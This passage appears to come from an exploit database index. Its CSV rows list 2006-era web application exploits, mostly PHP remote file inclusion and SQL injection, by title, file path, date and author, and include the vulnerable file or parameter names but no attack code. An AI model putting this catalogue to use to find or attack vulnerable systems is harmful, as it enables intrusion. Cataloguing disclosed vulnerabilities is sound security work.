+2432,exploits/php/webapps/2432.txt,"BrudaNews 1.1 - '/admin/index.php' Remote File Inclusion",2006-09-25,SHiKaA,webapps,php, +2433,exploits/php/webapps/2433.txt,"BrudaGB 1.1 - '/admin/index.php' Remote File Inclusion",2006-09-25,SHiKaA,webapps,php, +2434,exploits/php/webapps/2434.txt,"faceStones personal 2.0.42 - 'fs_form_links.php' File Inclusion",2006-09-25,SHiKaA,webapps,php, +2435,exploits/php/webapps/2435.txt,"Web//News 1.4 - 'parser.php' Remote File Inclusion (1)",2006-09-26,ThE-WoLf-KsA,webapps,php, +2436,exploits/php/webapps/2436.txt,"A-Blog 2.0 - 'menu.php' Remote File Inclusion",2006-09-26,Drago84,webapps,php, +2437,exploits/php/webapps/2437.php,"paBugs 2.0 Beta 3 - 'class.mysql.php' Remote File Inclusion",2006-09-26,Kacper,webapps,php, +2438,exploits/php/webapps/2438.txt,"Kietu? < 4.0.0b2 - 'hit.php' Remote File Inclusion",2006-09-26,D_7J,webapps,php, +2439,exploits/php/webapps/2439.txt,"Newswriter SW 1.42 - 'editfunc.inc.php' File Inclusion",2006-09-27,"Silahsiz Kuvvetler",webapps,php, +2441,exploits/php/webapps/2441.pl,"Blog Pixel Motion 2.1.1 - PHP Code Execution / Create Admin",2006-09-27,DarkFig,webapps,php, +2442,exploits/php/webapps/2442.txt,"A-Blog 2.0 - Multiple Remote File Inclusions",2006-09-27,v1per-haCker,webapps,php, +2443,exploits/php/webapps/2443.txt,"Newswriter SW 1.4.2 - 'main.inc.php' Remote File Inclusion",2006-09-27,"Mehmet Ince",webapps,php, +2446,exploits/php/webapps/2446.php,"PPA Gallery 1.0 - 'functions.inc.php' Remote File Inclusion",2006-09-28,Kacper,webapps,php, +2447,exploits/php/webapps/2447.php,"KGB 1.87 - Local File Inclusion / Remote Code Execution",2006-09-28,Kacper,webapps,php, +2449,exploits/php/webapps/2449.txt,"Les Visiteurs (Visitors) 2.0 - 'config.inc.php' File Inclusion",2006-09-28,D_7J,webapps,php, +2450,exploits/php/webapps/2450.txt,"TagIt! Tagboard 2.1.b b2 - 'index.php' Remote File Inclusion",2006-09-28,Kernel-32,webapps,php, +2451,exploits/php/webapps/2451.txt,"phpMyWebmin 1.0 - 'window.php' Remote File Inclusion",2006-09-28,Kernel-32,webapps,php, +2452,exploits/php/webapps/2452.txt,"PHPSecurePages 0.28b - 'secure.php' Remote File Inclusion",2006-09-28,D_7J,webapps,php, +2453,exploits/php/webapps/2453.txt,"phpBB XS 0.58a - 'phpbb_root_path' Remote File Inclusion",2006-09-28,"Mehmet Ince",webapps,php, +2454,exploits/php/webapps/2454.txt,"PowerPortal 1.3a - 'index.php' Remote File Inclusion",2006-09-29,v1per-haCker,webapps,php, +2455,exploits/php/webapps/2455.php,"VideoDB 2.2.1 - 'pdf.php' Remote File Inclusion",2006-09-29,Kacper,webapps,php, +2456,exploits/php/webapps/2456.php,"PHP Krazy Image Hosting 0.7a - 'display.php' SQL Injection",2006-09-29,Trex,webapps,php, +2457,exploits/php/webapps/2457.php,"UBBCentral UBB.Threads 6.5.1.1 - 'doeditconfig.php' Code Execution",2006-09-29,"HACKERS PAL",webapps,php, +2459,exploits/php/webapps/2459.txt,"Forum82 < 2.5.2b - 'repertorylevel' Multiple File Inclusions",2006-09-29,"Silahsiz Kuvvetler",webapps,php, +2461,exploits/php/webapps/2461.txt,"VAMP Webmail 2.0beta1 - 'yesno.phtml' Remote File Inclusion",2006-09-30,Drago84,webapps,php, +2462,exploits/php/webapps/2462.txt,"phpMyWebmin 1.0 - 'target' Remote File Inclusion",2006-09-30,"Mehmet Ince",webapps,php, +2465,exploits/php/webapps/2465.php,"BasiliX 1.1.1 - 'BSX_LIBDIR' Remote File Inclusion",2006-10-01,Kacper,webapps,php, +2468,exploits/php/webapps/2468.txt,"BBaCE 3.5 - '/includes/functions.php' Remote File Inclusion",2006-10-02,SpiderZ,webapps,php, +2469,exploits/php/webapps/2469.pl,"JAF CMS 4.0 RC1 - 'forum.php' Remote File Inclusion",2006-10-03,Kacper,webapps,php, +2470,exploits/php/webapps/2470.txt,"phpMyProfiler 0.9.6 - Remote File Inclusion",2006-10-03,mozi,webapps,php, +2471,exploits/php/webapps/2471.pl,"Travelsized CMS 0.4 - 'FrontPage.php' Remote File Inclusion",2006-10-03,Kacper,webapps,php, +2472,exploits/php/webapps/2472.pl,"Klinza Professional CMS 5.0.1 - 'show_hlp.php' File Inclusion",2006-10-03,Kacper,webapps,php, +2473,exploits/php/webapps/2473.c,"Invision Gallery 2.0.7 - 'readfile()' / SQL Injection",2006-10-03,1nf3ct0r,webapps,php, +2474,exploits/php/webapps/2474.txt,"JAF CMS 4.0 RC1 - Multiple Remote File Inclusions",2006-10-04,"ThE TiGeR",webapps,php, +2475,exploits/php/webapps/2475.txt,"phpBB Admin Topic Action Logging Mod 0.94b - Remote File Inclusion",2006-10-04,SpiderZ,webapps,php, +2476,exploits/php/webapps/2476.txt,"PHPGreetz 0.99 - 'footer.php' Remote File Inclusion",2006-10-04,mozi,webapps,php, +2477,exploits/php/webapps/2477.txt,"phpBB Static Topics 1.0 - 'phpbb_root_path' File Inclusion",2006-10-04,Kw3[R]Ln,webapps,php, +2478,exploits/php/webapps/2478.txt,"phpMyTeam 2.0 - 'smileys_dir' Remote File Inclusion",2006-10-05,"Mehmet Ince",webapps,php, +2479,exploits/php/webapps/2479.txt,"PHP Classifieds 7.1 - 'index.php' SQL Injection",2006-10-05,Kzar,webapps,php, +2480,exploits/php/webapps/2480.txt,"phpBB Security Suite Mod 1.0.0 - 'logger_engine.php' Remote File Inclusion",2006-10-05,SpiderZ,webapps,php, +2481,exploits/php/webapps/2481.txt,"Dimension of phpBB 0.2.6 - 'phpbb_root_path' Remote File Inclusions",2006-10-05,SpiderZ,webapps,php, +2483,exploits/php/webapps/2483.txt,"phpBB User Viewed Posts Tracker 1.0 - Remote File Inclusion",2006-10-06,"Mehmet Ince",webapps,php, +2484,exploits/php/webapps/2484.txt,"FreeForum 0.9.7 - 'forum.php' Remote File Inclusion",2006-10-07,"Mehmet Ince",webapps,php, +2485,exploits/php/webapps/2485.pl,"Cahier de texte 2.0 - 'lire.php' SQL Injection",2006-10-07,s4mi,webapps,php, +2486,exploits/php/webapps/2486.txt,"phpBB Random User Registration Number 1.0 Mod - Remote File Inclusion",2006-10-07,bd0rk,webapps,php, +2487,exploits/php/webapps/2487.php,"4Images 1.7.x - 'search.php' SQL Injection",2006-10-08,Synsta,webapps,php, +2488,exploits/php/webapps/2488.txt,"PHPMyNews 1.4 - 'cfg_include_dir' Remote File Inclusion",2006-10-08,"Mehmet Ince",webapps,php, +2489,exploits/php/webapps/2489.pl,"Ciamos CMS 0.9.6b - 'config.php' Remote File Inclusion",2006-10-08,Kacper,webapps,php, +2490,exploits/php/webapps/2490.txt,"Freenews 1.1 - 'moteur.php' Remote File Inclusion",2006-10-08,"Mehmet Ince",webapps,php, +2491,exploits/php/webapps/2491.pl,"PHPPC 1.03 RC1 - '/lib/functions.inc.php' Remote File Inclusion",2006-10-08,ThE-WoLf-KsA,webapps,php, +2493,exploits/php/webapps/2493.pl,"docmint 2.0 - '/engine/require.php' Remote File Inclusion",2006-10-09,K-159,webapps,php, +2494,exploits/php/webapps/2494.txt,"OpenDock Easy Doc 1.4 - 'doc_directory' File Inclusion",2006-10-09,the_day,webapps,php, +2495,exploits/php/webapps/2495.txt,"OpenDock Easy Blog 1.4 - 'doc_directory' File Inclusion",2006-10-09,the_day,webapps,php, +2496,exploits/php/webapps/2496.txt,"WebYep 1.1.9 - 'webyep_sIncludePath' File Inclusion",2006-10-09,the_day,webapps,php, +2497,exploits/php/webapps/2497.txt,"OpenDock Easy Gallery 1.4 - 'doc_directory' File Inclusion",2006-10-09,the_day,webapps,php, +2498,exploits/php/webapps/2498.php,"Flatnuke 2.5.8 - 'file()' Privilege Escalation / Code Execution",2006-10-10,rgod,webapps,php, +2499,exploits/php/webapps/2499.php,"Flatnuke 2.5.8 - 'userlang' Local Inclusion / Delete All Users",2006-10-10,rgod,webapps,php, +2500,exploits/php/webapps/2500.pl,"phpMyAgenda 3.1 - '/templates/header.php3' Local File Inclusion",2006-10-10,"Nima Salehi",webapps,php, +2501,exploits/php/webapps/2501.txt,"TribunaLibre 3.12 Beta - 'ftag.php' Remote File Inclusion",2006-10-10,DarkFig,webapps,php, +2502,exploits/php/webapps/2502.txt,"registroTL - 'main.php' Remote File Inclusion",2006-10-10,DarkFig,webapps,php, +2503,exploits/php/webapps/2503.txt,"compteur 2.0 - 'param_editor.php' Remote File Inclusion",2006-10-10,DarkFig,webapps,php, +2504,exploits/php/webapps/2504.txt,"eboli - 'index.php' Remote File Inclusion",2006-10-10,DarkFig,webapps,php, +2505,exploits/php/webapps/2505.txt,"JASmine 0.0.2 - 'index.php' Remote File Inclusion",2006-10-10,DarkFig,webapps,php, +2506,exploits/php/webapps/2506.txt,"Foafgen 0.3 - 'redir.php' Local Source Disclosure",2006-10-10,DarkFig,webapps,php, +2507,exploits/php/webapps/2507.txt,"Album Photo Sans Nom 1.6 - Remote Source Disclosure",2006-10-10,DarkFig,webapps,php, +2508,exploits/php/webapps/2508.txt,"vTiger CRM 4.2 - 'calpath' Multiple Remote File Inclusions",2006-10-10,the_day,webapps,php, +2509,exploits/php/webapps/2509.txt,"Exhibit Engine 1.5 RC 4 - 'photo_comment.php' File Inclusion",2006-10-10,Kacper,webapps,php, +2510,exploits/php/webapps/2510.txt,"Claroline 1.8.0 rc1 - 'import.lib.php' Remote File Inclusion",2006-10-10,k1tk4t,webapps,php, +2511,exploits/php/webapps/2511.txt,"PHPLibrary 1.5.3 - 'grid3.lib.php' Remote File Inclusion",2006-10-10,k1tk4t,webapps,php, +2512,exploits/php/webapps/2512.txt,"Jinzora 2.1 - 'media.php' Remote File Inclusion",2006-10-10,k1tk4t,webapps,php, +2513,exploits/php/webapps/2513.txt,"ae2 - 'standart.inc.php' Remote File Inclusion",2006-10-10,k1tk4t,webapps,php, +2514,exploits/php/webapps/2514.txt,"n@board 3.1.9e - 'naboard_pnr.php' Remote File Inclusion",2006-10-11,mdx,webapps,php, +2516,exploits/php/webapps/2516.pl,"CommunityPortals 1.0 - 'import-archive.php' File Inclusion",2006-10-11,"Nima Salehi",webapps,php, +2517,exploits/php/webapps/2517.pl,"PHP News Reader 2.6.4 - 'phpBB.inc.php' Remote File Inclusion",2006-10-11,"Nima Salehi",webapps,php, +2518,exploits/php/webapps/2518.txt,"SH-News 3.1 - 'scriptpath' Remote File Inclusion",2006-10-11,v1per-haCker,webapps,php, +2519,exploits/php/webapps/2519.txt,"Minichat 6.0 - 'ftag.php' Remote File Inclusion",2006-10-11,Zickox,webapps,php, +2520,exploits/php/webapps/2520.txt,"Softerra PHP Developer Library 1.5.3 - Remote File Inclusion",2006-10-12,MP,webapps,php, +2521,exploits/php/webapps/2521.txt,"Download-Engine 1.4.2 - 'spaw' Remote File Inclusion",2006-10-12,v1per-haCker,webapps,php, +2522,exploits/php/webapps/2522.txt,"phpBB Journals System Mod 1.0.2 RC2 - Remote File Inclusion",2006-10-12,"Nima Salehi",webapps,php, +2525,exploits/php/webapps/2525.pl,"phpBB Insert User Mod 0.1.2 - Remote File Inclusion",2006-10-12,"Nima Salehi",webapps,php, +2526,exploits/php/webapps/2526.txt,"PHPht Topsites - 'common.php' Remote File Inclusion",2006-10-12,"Mehmet Ince",webapps,php, +2527,exploits/php/webapps/2527.c,"Invision Gallery 2.0.7 (Linux) - 'readfile()' / SQL Injection",2006-10-12,ShadOS,webapps,php, +2528,exploits/php/webapps/2528.txt,"MiniBB keyword_replacer 1.0 - 'pathToFiles' File Inclusion",2006-10-12,Kw3[R]Ln,webapps,php, +2529,exploits/php/webapps/2529.txt,"AFGB Guestbook 2.2 - 'Htmls' Remote File Inclusion",2006-10-12,mdx,webapps,php, +2531,exploits/php/webapps/2531.txt,"phpBB Import Tools Mod 0.1.4 - Remote File Inclusion",2006-10-12,boecke,webapps,php, +2532,exploits/php/webapps/2532.txt,"phpBB Ajax Shoutbox 0.0.5 - Remote File Inclusion",2006-10-12,boecke,webapps,php, +2533,exploits/php/webapps/2533.txt,"phpBB SpamBlocker Mod 1.0.2 - Remote File Inclusion",2006-10-12,"Nima Salehi",webapps,php, +2534,exploits/php/webapps/2534.pl,"Redaction System 1.0 - 'lang_prefix' Remote File Inclusion",2006-10-12,r0ut3r,webapps,php, +2535,exploits/php/webapps/2535.txt,"PHPMyConferences 8.0.2 - 'menu.inc.php' File Inclusion",2006-10-13,k1tk4t,webapps,php, +2536,exploits/php/webapps/2536.txt,"Open Conference Systems 1.1.4 - 'fullpath' File Inclusion",2006-10-13,k1tk4t,webapps,php, +2537,exploits/php/webapps/2537.pl,"maluinfo 206.2.38 - 'bb_usage_stats.php' Remote File Inclusion",2006-10-13,"Nima Salehi",webapps,php, +2538,exploits/php/webapps/2538.pl,"phpBB PlusXL 2.0_272 - 'constants.php' Remote File Inclusion",2006-10-13,"Nima Salehi",webapps,php, +2539,exploits/php/webapps/2539.txt,"Genepi 1.6 - 'genepi.php' Remote File Inclusion",2006-10-13,Kw3[R]Ln,webapps,php, +2540,exploits/php/webapps/2540.txt,"Cdsagenda 4.2.9 - 'SendAlertEmail.php' File Inclusion",2006-10-13,Drago84,webapps,php, +2544,exploits/php/webapps/2544.pl,"phpBB Amazonia Mod - 'zufallscodepart.php' Remote File Inclusion",2006-10-13,"Nima Salehi",webapps,php, +2545,exploits/php/webapps/2545.pl,"phpBB News Defilante Horizontale 4.1.1 - Remote File Inclusion",2006-10-13,"Nima Salehi",webapps,php, +2546,exploits/php/webapps/2546.pl,"phpBB lat2cyr Mod 1.0.1 - 'lat2cyr.php' Remote File Inclusion",2006-10-13,"Nima Salehi",webapps,php, +2547,exploits/php/webapps/2547.pl,"phpBB SpamOborona Mod 1.0b - Remote File Inclusion",2006-10-13,"Nima Salehi",webapps,php, +2548,exploits/php/webapps/2548.pl,"phpBB RPG Events 1.0 - 'functions_rpg_events' Remote File Inclusion",2006-10-13,"Nima Salehi",webapps,php, +2549,exploits/php/webapps/2549.pl,"phpBB SearchIndexer Mod - 'archive_topic.php' Remote File Inclusion",2006-10-13,"Nima Salehi",webapps,php, +2550,exploits/php/webapps/2550.pl,"phpBB Prillian French Mod 0.8.0 - Remote File Inclusion",2006-10-13,"Nima Salehi",webapps,php, +2551,exploits/php/webapps/2551.txt,"phpBB ACP User Registration Mod 1.0 - Remote File Inclusion",2006-10-13,bd0rk,webapps,php, +2552,exploits/php/webapps/2552.pl,"phpBB Security 1.0.1 - 'PHP_security.php' Remote File Inclusion",2006-10-13,"Nima Salehi",webapps,php, +2553,exploits/php/webapps/2553.txt,"YaBBSM 3.0.0 - 'Offline.php' Remote File Inclusion",2006-10-13,SilenZ,webapps,php, +2554,exploits/php/webapps/2554.php,"cPanel 10.8.x - 'cpwrap' via MySQLAdmin Privilege Escalation (PHP)",2006-10-13,"Nima Salehi",webapps,php, +2555,exploits/php/webapps/2555.txt,"CentiPaid 1.4.2 - 'centipaid_class.php' Remote File Inclusion",2006-10-14,Kw3[R]Ln,webapps,php, +2556,exploits/php/webapps/2556.txt,"E-Uploader Pro 1.0 - Image Upload / Code Execution",2006-10-14,Kacper,webapps,php, +2557,exploits/php/webapps/2557.txt,"IncCMS Core 1.0.0 - 'settings.php' Remote File Inclusion",2006-10-14,Kacper,webapps,php, +2558,exploits/php/webapps/2558.txt,"Jinzora 2.6 - '/extras/mt.php' Remote File Inclusion",2006-10-14,ddoshomo,webapps,php, +2559,exploits/php/webapps/2559.txt,"CyberBrau 0.9.4 - '/forum/track.php' Remote File Inclusion",2006-10-15,Kw3[R]Ln,webapps,php, +2560,exploits/php/webapps/2560.txt,"CampSite 2.6.1 - 'g_documentRoot' Remote File Inclusion",2006-10-15,Kw3[R]Ln,webapps,php, +2561,exploits/php/webapps/2561.txt,"NuralStorm Webmail 0.98b - 'process.php' Remote File Inclusion",2006-10-15,Kw3[R]Ln,webapps,php, +2562,exploits/php/webapps/2562.txt,"AROUNDMe 0.5.2 - 'templatePath' Remote File Inclusion",2006-10-15,Kw3[R]Ln,webapps,php, +2563,exploits/php/webapps/2563.pl,"phpBurningPortal 1.0.1 - 'lang_path' Remote File Inclusion",2006-10-15,r0ut3r,webapps,php, +2564,exploits/php/webapps/2564.pl,"phpBBFM 206-3-3 - 'phpbb_root_path' Remote File Inclusion",2006-10-15,Kamalian,webapps,php, +2566,exploits/php/webapps/2566.txt,"DigitalHive 2.0 RC2 - 'base_include.php' Remote File Inclusion",2006-10-15,SHiKaA,webapps,php, +2567,exploits/php/webapps/2567.txt,"Def-Blog 1.0.3 - 'comadd.php' SQL Injection",2006-10-15,SHiKaA,webapps,php, +2568,exploits/php/webapps/2568.txt,"webSPELL 4.01.01 - 'getsquad' SQL Injection",2006-10-15,Kiba,webapps,php, +2570,exploits/php/webapps/2570.txt,"OpenDock FullCore 4.4 - Remote File Inclusion",2006-10-16,Matdhule,webapps,php, +2572,exploits/php/webapps/2572.txt,"Osprey 1.0 - 'GetRecord.php' Remote File Inclusion",2006-10-16,Kw3[R]Ln,webapps,php, +2573,exploits/php/webapps/2573.php,"Comdev One Admin 4.1 - 'Adminfoot.php' Remote Code Execution",2006-10-16,w4ck1ng,webapps,php, +2574,exploits/php/webapps/2574.php,"Simplog 0.9.3.1 - 'comments.php' SQL Injection",2006-10-16,w4ck1ng,webapps,php, +2575,exploits/php/webapps/2575.php,"Boonex Dolphin 5.2 - 'index.php' Remote Code Execution",2006-10-16,w4ck1ng,webapps,php, +2576,exploits/php/webapps/2576.txt,"Specimen Image Database - 'client.php' Remote File Inclusion",2006-10-16,Kw3[R]Ln,webapps,php, +2577,exploits/php/webapps/2577.txt,"P-News 1.16 - Remote File Inclusion",2006-10-16,vegas78,webapps,php, +2578,exploits/php/webapps/2578.txt,"PHPMyManga 0.8.1 - 'template.php' Multiple File Inclusions",2006-10-16,nuffsaid,webapps,php, +2579,exploits/php/webapps/2579.pl,"WoltLab Burning Book 1.1.2 - SQL Injection (PoC)",2006-10-16,ShAnKaR,webapps,php, +2582,exploits/php/webapps/2582.txt,"ALiCE-CMS 0.1 - 'CONFIG[local_root]' Remote File Inclusion",2006-10-17,nuffsaid,webapps,php, +2583,exploits/php/webapps/2583.php,"WSN Forum 1.3.4 - 'prestart.php' Remote Code Execution",2006-10-17,Kacper,webapps,php, +2584,exploits/php/webapps/2584.pl,"PHPRecipeBook 2.35 - 'g_rb_basedir' Remote File Inclusion",2006-10-17,r0ut3r,webapps,php, +2585,exploits/php/webapps/2585.txt,"PHPmybibli 3.0.1 - Multiple Remote File Inclusions",2006-10-17,the_day,webapps,php, +2588,exploits/php/webapps/2588.txt,"Easynews 4.4.1 - 'admin.php' Authentication Bypass",2006-10-17,nuffsaid,webapps,php, +2589,exploits/php/webapps/2589.txt,"Brim 1.2.1 - 'renderer' Multiple Remote File Inclusions",2006-10-17,mdx,webapps,php, +2590,exploits/php/webapps/2590.txt,"PHPPowerCards 2.10 - 'txt.inc.php' Remote Code Execution",2006-10-18,nuffsaid,webapps,php, +2591,exploits/php/webapps/2591.txt,"PHP AMX 0.90 - '/plugins/main.php' Remote File Inclusion",2006-10-18,MP,webapps,php, +2592,exploits/asp/webapps/2592.html,"Active Bulletin Board 1.1b2 - Remote User Pass Change",2006-10-18,ajann,webapps,asp, +2593,exploits/php/webapps/2593.php,"PHP-Post 1.01 - 'template' Remote Code Execution",2006-10-18,Kacper,webapps,php, +2594,exploits/php/webapps/2594.php,"YapBB 1.2 Beta2 - 'yapbb_session.php' Remote File Inclusion",2006-10-18,Kacper,webapps,php, +2595,exploits/php/webapps/2595.txt,"LoCal Calendar 1.1 - 'lcUser.php' Remote File Inclusion",2006-10-18,o0xxdark0o,webapps,php, +2596,exploits/php/webapps/2596.pl,"EPNadmin 0.7 - 'constantes.inc.php' Remote File Inclusion",2006-10-19,Kw3[R]Ln,webapps,php, +2598,exploits/php/webapps/2598.php,"PH Pexplorer 0.24 - 'explorer_load_lang.php' Local File Inclusion",2006-10-19,Kacper,webapps,php, +2599,exploits/php/webapps/2599.txt,"pandaBB - 'displayCategory' Remote File Inclusion",2006-10-19,nukedclx,webapps,php, +2600,exploits/php/webapps/2600.txt,"Segue CMS 1.5.8 - 'themesdir' Remote File Inclusion",2006-10-19,nuffsaid,webapps,php, +2602,exploits/php/webapps/2602.txt,"Power Phlogger 2.0.9 - 'config.inc.php3' File Inclusion",2006-10-19,x_w0x,webapps,php, +2603,exploits/php/webapps/2603.txt,"Lou Portail 1.4.1 - 'admin_module.php' Remote File Inclusion",2006-10-20,MP,webapps,php, +2604,exploits/php/webapps/2604.txt,"WGCC 0.5.6b - 'quiz.php' SQL Injection",2006-10-20,ajann,webapps,php, +2605,exploits/php/webapps/2605.txt,"RSSonate - 'xml2rss.php' Remote File Inclusion",2006-10-21,Kw3[R]Ln,webapps,php, +2606,exploits/php/webapps/2606.txt,"CASTOR 1.1.1 - '/lib/rs.php' Remote File Inclusion",2006-10-21,Kw3[R]Ln,webapps,php, +2607,exploits/php/webapps/2607.txt,"kawf 1.0 - 'main.php' Remote File Inclusion",2006-10-21,o0xxdark0o,webapps,php, +2608,exploits/php/webapps/2608.txt,"Virtual Law Office - 'phpc_root_path' Remote File Inclusion",2006-10-21,"Mehmet Ince",webapps,php, +2609,exploits/php/webapps/2609.txt,"Open Meetings Filing Application - Remote File Inclusion",2006-10-21,"Mehmet Ince",webapps,php, +2611,exploits/php/webapps/2611.txt,"Trawler Web CMS 1.8.1 - Multiple Remote File Inclusions",2006-10-21,k1tk4t,webapps,php, +2612,exploits/php/webapps/2612.txt,"PGOSD - '/misc/function.php3' Remote File Inclusion",2006-10-22,"Mehmet Ince",webapps,php, +2613,exploits/php/webapps/2613.txt,"Mambo Module MambWeather 1.8.1 - Remote File Inclusion",2006-10-22,h4ntu,webapps,php, +2614,exploits/php/webapps/2614.txt,"Net_DNS 0.3 - '/DNS/RR.php' Remote File Inclusion",2006-10-22,Drago84,webapps,php, +2615,exploits/php/webapps/2615.txt,"SpeedBerg 1.2beta1 - 'SPEEDBERG_PATH' File Inclusion",2006-10-22,k1tk4t,webapps,php, +2616,exploits/php/webapps/2616.php,"JaxUltraBB 2.0 - 'delete.php' Remote Auto Deface",2006-10-22,Kacper,webapps,php, +2617,exploits/php/webapps/2617.php,"PHP-Nuke 7.9 - 'Encyclopedia' SQL Injection",2006-10-22,Paisterist,webapps,php, +2620,exploits/php/webapps/2620.txt,"EZ-Ticket 0.0.1 - 'common.php' Remote File Inclusion",2006-10-22,"the master",webapps,php, +2621,exploits/php/webapps/2621.txt,"Fully Modded phpBB 2021.4.40 - Multiple File Inclusions",2006-10-23,020,webapps,php, +2622,exploits/php/webapps/2622.txt,"OTSCMS 2.1.3 - Multiple Remote File Inclusions",2006-10-23,GregStar,webapps,php, +2623,exploits/php/webapps/2623.pl,"SourceForge 1.0.4 - 'database.php' Remote File Inclusion",2006-10-23,Kw3[R]Ln,webapps,php, +2624,exploits/php/webapps/2624.txt,"WiClear 0.10 - 'path' Remote File Inclusion",2006-10-23,"the master",webapps,php, +2626,exploits/php/webapps/2626.txt,"MDweb 1.3 - 'chemin_appli' Remote File Inclusion",2006-10-23,Drago84,webapps,php, +2627,exploits/php/webapps/2627.txt,"Jaws 0.5.2 - '/include/JawsDB.php' Remote File Inclusion",2006-10-23,Drago84,webapps,php, +2628,exploits/php/webapps/2628.pl,"JumbaCMS 0.0.1 - '/includes/functions.php' Remote File Inclusion",2006-10-23,Kw3[R]Ln,webapps,php, +2630,exploits/php/webapps/2630.txt,"InteliEditor 1.2.x - 'lib.editor.inc.php' Remote File Inclusion",2006-10-24,"Mehmet Ince",webapps,php, +2631,exploits/php/webapps/2631.php,"Ascended Guestbook 1.0.0 - 'embedded.php' File Inclusion",2006-10-24,Kacper,webapps,php, +2632,exploits/php/webapps/2632.pl,"CMS Faethon 2.0 - 'mainpath' Remote File Inclusion",2006-10-24,r0ut3r,webapps,php, +2640,exploits/php/webapps/2640.txt,"UeberProject 1.0 - '/login/secure.php' Remote File Inclusion",2006-10-24,"Mehmet Ince",webapps,php, +2642,exploits/asp/webapps/2642.asp,"Berty Forum 1.4 - 'index.php' Blind SQL Injection",2006-10-24,ajann,webapps,asp, +2643,exploits/php/webapps/2643.php,"JaxUltraBB 2.0 - Command Execution",2006-10-24,BlackHawk,webapps,php, +2644,exploits/php/webapps/2644.php,"Discuz! 5.0.0 GBK - SQL Injection / Admin Credentials Disclosure",2006-10-25,rgod,webapps,php, +2645,exploits/php/webapps/2645.txt,"ArticleBeach Script 2.0 - 'index.php' Remote File Inclusion",2006-10-25,Bithedz,webapps,php, +2646,exploits/php/webapps/2646.txt,"TextPattern 1.19 - 'publish.php' Remote File Inclusion",2006-10-25,Bithedz,webapps,php, +2647,exploits/php/webapps/2647.php,"Imageview 5 - '/Cookie/index.php' Local/Remote File Inclusion",2006-10-25,Kacper,webapps,php, +2648,exploits/php/webapps/2648.txt,"CommentIT - 'PathToComment' Remote File Inclusion",2006-10-25,"Cold Zero",webapps,php, +2652,exploits/php/webapps/2652.html,"PHP League 0.81 - 'config.php' Remote File Inclusion",2006-10-25,ajann,webapps,php, +2653,exploits/php/webapps/2653.txt,"MPCS 1.0 - 'path' Remote File Inclusion",2006-10-26,v1per-haCker,webapps,php, +2654,exploits/php/webapps/2654.txt,"ask_rave 0.9 PR - 'end.php?footfile' Remote File Inclusion",2006-10-26,v1per-haCker,webapps,php, +2655,exploits/php/webapps/2655.php,"MiniBB 2.0.2 - 'bb_func_txt.php' Remote File Inclusion",2006-10-26,Kacper,webapps,php, +2656,exploits/php/webapps/2656.txt,"MiniBill 20061010 - 'menu_builder.php' File Inclusion",2006-10-26,"Mehmet Ince",webapps,php, +2658,exploits/php/webapps/2658.php,"Light Blog Remote - Multiple Vulnerabilities",2006-10-27,BlackHawk,webapps,php, +2659,exploits/php/webapps/2659.php,"N/X WCMS 4.1 - 'nxheader.inc.php' Remote File Inclusion",2006-10-27,Kacper,webapps,php, +2660,exploits/php/webapps/2660.php,"Coppermine Photo Gallery 1.4.9 - SQL Injection",2006-10-27,w4ck1ng,webapps,php, +2661,exploits/asp/webapps/2661.asp,"PHP League 0.82 - 'classement.php' SQL Injection",2006-10-27,ajann,webapps,asp, +2662,exploits/asp/webapps/2662.txt,"Hosting Controller 6.1 Hotfix 3.2 - Unauthenticated Access",2006-10-27,"Soroush Dalili",webapps,asp, +2663,exploits/php/webapps/2663.txt,"PhpShop Core 0.9.0 RC1 - 'PS_BASE' File Inclusion",2006-10-28,"Cold Zero",webapps,php, +2664,exploits/php/webapps/2664.pl,"PHPMyDesk 1.0 Beta - 'viewticket.php' Local File Inclusion",2006-10-28,Kw3[R]Ln,webapps,php, +2665,exploits/php/webapps/2665.txt,"FreePBX 2.1.3 - 'upgrade.php' Remote File Inclusion",2006-10-28,"Mehmet Ince",webapps,php, +2666,exploits/php/webapps/2666.txt,"mp3SDS 3.0 - '/Core/core.inc.php' Remote File Inclusion",2006-10-28,"Mehmet Ince",webapps,php, +2667,exploits/php/webapps/2667.txt,"Electronic Engineering Tool (EE TOOL) 0.4.1 - Remote File Inclusion",2006-10-28,"Mehmet Ince",webapps,php, +2668,exploits/php/webapps/2668.html,"MiraksGalerie 2.62 - 'pcltar.lib.php' Remote File Inclusion",2006-10-28,ajann,webapps,php, +2669,exploits/php/webapps/2669.php,"Free Image Hosting 1.0 - 'forgot_pass.php' File Inclusion",2006-10-28,Kacper,webapps,php, +2670,exploits/php/webapps/2670.php,"Free File Hosting 1.1 - 'forgot_pass.php' File Inclusion",2006-10-28,Kacper,webapps,php, +2673,exploits/php/webapps/2673.txt,"Simple Website Software 0.99 - 'common.php' File Inclusion",2006-10-29,"Mehmet Ince",webapps,php, +2674,exploits/php/webapps/2674.php,"MySource CMS 2.16.2 - 'init_mysource.php' Remote File Inclusion",2006-10-29,Kacper,webapps,php, +2675,exploits/php/webapps/2675.asp,"PHPEasyData Pro 2.2.2 - 'index.php' SQL Injection",2006-10-29,ajann,webapps,php, +2677,exploits/php/webapps/2677.asp,"Netref 4 - 'cat_for_aff.php' Source Code Disclosure",2006-10-29,ajann,webapps,php, +2678,exploits/php/webapps/2678.txt,"Faq Administrator 2.1 - 'faq_reply.php' Remote File Inclusion",2006-10-29,v1per-haCker,webapps,php, +2679,exploits/php/webapps/2679.txt,"PHPMyRing 4.2.1 - 'cherche.php' SQL Injection",2006-10-29,ajann,webapps,php, +2681,exploits/php/webapps/2681.txt,"QnECMS 2.5.6 - 'adminfolderpath' Remote File Inclusion",2006-10-30,K-159,webapps,php, +2683,exploits/asp/webapps/2683.txt,"Techno Dreams Announcement - 'key' SQL Injection",2006-10-30,ajann,webapps,asp, +2684,exploits/asp/webapps/2684.txt,"Techno Dreams Guestbook 1.0 - 'key' SQL Injection",2006-10-30,ajann,webapps,asp, +2685,exploits/php/webapps/2685.php,"Nitrotech 0.0.3a - Remote Code Execution",2006-10-30,Kacper,webapps,php, +2686,exploits/php/webapps/2686.php,"phpBB Spider Friendly Module 1.3.10 - Remote File Inclusion",2006-10-30,Kacper,webapps,php, +2687,exploits/php/webapps/2687.html,"E Annu 1.0 - Authentication Bypass / SQL Injection",2006-10-30,ajann,webapps,php, +2688,exploits/php/webapps/2688.txt,"phpProfiles 2.1 Beta - Multiple Remote File Inclusions",2006-10-30,v1per-haCker,webapps,php, +2691,exploits/php/webapps/2691.txt,"P-Book 1.17 - 'pb_lang' Remote File Inclusion",2006-10-31,Matdhule,webapps,php, +2692,exploits/php/webapps/2692.txt,"GEPI 1.4.0 - '/gestion/savebackup.php' Remote File 